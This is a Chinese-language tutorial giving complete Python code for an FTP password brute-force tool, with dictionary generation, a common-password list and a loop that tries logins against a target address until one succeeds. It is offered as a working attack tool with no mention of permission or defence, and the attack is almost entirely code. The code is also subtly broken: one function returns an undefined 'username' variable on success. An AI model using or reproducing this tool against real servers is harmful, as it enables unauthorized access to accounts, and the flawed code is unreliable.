下面是Python编写暴力破解FTP密码小工具的完整攻略,过程分为以下几步:
1. 导入相关库
在Python中实现FTP文件传输需要使用ftplib库,因此我们需要先导入该库。
import ftplib
import sys
import os
2. 连接FTP服务器
通过ftplib库连接FTP服务器,需要提供服务器的IP地址、FTP用户名和密码。示例代码如下:
def brute_login(hostname, passwdfile):
pfd = open(passwdfile, 'r')
for line in pfd.readlines():
username = line.split(':')[0]
password = line.split(':')[1].strip('\n')
print("[+] Trying: " + username + "/" + password)
try:
ftp = ftplib.FTP(hostname)
ftp.login(username, password)
print("[+] Login Succeeded: " + username + "/" + password)
ftp.quit()
return (username, password)
except ftplib.error_perm as e:
pass
print("[-] Passwords not found.")
return (None, None)
target_server = "192.168.1.1"
user_pass_file = "userpass.txt" # 包含用户名和密码
brute_login(target_server, user_pass_file)
3. 构建字典
在暴力破解FTP密码时,需要提供一定数量的字典,对常用密码进行一一尝试,以达到破解密码的目的。不同的字典可以用于不同的场景,此处提供两个示例。
示例 1:纯数字密码字典
def gen_num_passwd_dict(start_num, end_num):
pwd_dict = []
for num in range(start_num, end_num+1):
pwd_dict.append(str(num))
return pwd_dict
passwd_list = gen_num_passwd_dict(100, 999)
示例 2:包含常用密码的列表
passwd_list = ["password", "admin", "123456", "12345678", "qwerty", "letmein", "monkey", "112233", "sunshine"]
4. 破解密码
通过循环我们可以将每个密码都尝试一次,如果登陆成功就说明密码正确。示例代码如下:
def brute_login(hostname, passwd_dict):
for password in passwd_dict:
print("[+] Trying: " + password)
try:
ftp = ftplib.FTP(hostname)
ftp.login("admin", password)
print("[+] Login Succeeded: " + password)
ftp.quit()
return (username, password)
except ftplib.error_perm as e:
pass
print("[-] Passwords not found.")
return (None, None)
target_server = "192.168.1.1"
passwd_list = ["password", "admin", "123456", "12345678", "qwerty", "letmein", "monkey", "112233", "sunshine"]
brute_login(target_server, passwd_list)
5. 完整代码
import ftplib
import sys
import os
def gen_num_passwd_dict(start_num, end_num):
pwd_dict = []
for num in range(start_num, end_num+1):
pwd_dict.append(str(num))
return pwd_dict
def brute_login_1(hostname, passwd_list):
for password in passwd_list:
print("[+] Trying: " + password)
try:
ftp = ftplib.FTP(hostname)
ftp.login("admin", password)
print("[+] Login Succeeded: " + password)
ftp.quit()
return (username, password)
except ftplib.error_perm as e:
pass
print("[-] Passwords not found.")
return (None, None)
def brute_login_2(hostname, passwdfile):
pfd = open(passwdfile, 'r')
for line in pfd.readlines():
username = line.split(':')[0]
password = line.split(':')[1].strip('\n')
print("[+] Trying: " + username + "/" + password)
try:
ftp = ftplib.FTP(hostname)
ftp.login(username, password)
print("[+] Login Succeeded: " + username + "/" + password)
ftp.quit()
return (username, password)
except ftplib.error_perm as e:
pass
print("[-] Passwords not found.")
return (None, None)
target_server = "192.168.1.1"
passwd_list_1 = ["password", "admin", "123456", "12345678", "qwerty", "letmein", "monkey", "112233", "sunshine"]
brute_login_1(target_server, passwd_list_1)
passwdfile = "userpass.txt" # 包含用户名和密码
brute_login_2(target_server, passwdfile)
希望以上攻略可以对你有所帮助。